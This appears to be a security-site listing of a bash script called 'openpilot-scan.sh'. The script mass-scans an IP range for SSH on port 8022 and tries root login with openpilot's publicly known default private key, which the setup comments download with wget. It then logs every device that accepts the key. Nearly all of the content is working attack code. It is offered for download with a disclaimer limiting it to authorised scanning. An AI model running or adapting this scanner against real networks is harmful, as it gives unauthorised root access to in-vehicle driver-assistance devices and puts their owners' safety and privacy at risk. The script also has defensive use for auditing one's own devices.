Openpilot Default SSH Key Scanner

2020.12.31
Credit: Jeremy Brown
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/bin/bash # # openpilot-scan.sh # # Jeremy Brown [jbrown3264/gmail] # Dec 2020 # # Checks for openpilot devices using the default SSH key # # Setup # > apt-get install -y masscan && setcap cap_net_raw=ep /usr/bin/masscan # > wget -q https://raw.githubusercontent.com/commaai/openpilot/master/tools/ssh/id_rsa # > chmod 600 id_rsa # # Example # > ./openpilot-scan.sh 10.100.100.1/24 # # Disclaimer # This script will port scan and attempt login to SSH servers which accept a # given key. Use it at your own risk, no guarentees, only scan your own network # or those that you have permission to scan. You assume full responsibility # for any use or execution of these tools, authorized entry or otherwise actions. # KEY="id_rsa" MATCH_IP='[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' MASSCAN_LOG="masscan.log" SCAN_LOG="scan.log" FOUND_FILE="found.txt" SSH_PORT=8022 USER="root" if [ $# -ne 1 ]; then echo "usage: ./openpilot-scan.sh ra.n.g.e/24" exit 1 fi # scan masscan --open -p $SSH_PORT -oL $MASSCAN_LOG $1 >/dev/null 2>&1 # parse grep -ohP "$MATCH_IP" $MASSCAN_LOG > $SCAN_LOG # check while read IP do ssh $USER@$IP \ -p $SSH_PORT \ -o batchmode=yes \ -o StrictHostKeyChecking=no \ -T -i $KEY >/dev/null 2>&1 if [ $? -ne 255 ]; then echo $IP echo $IP >> $FOUND_FILE fi done < $SCAN_LOG


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top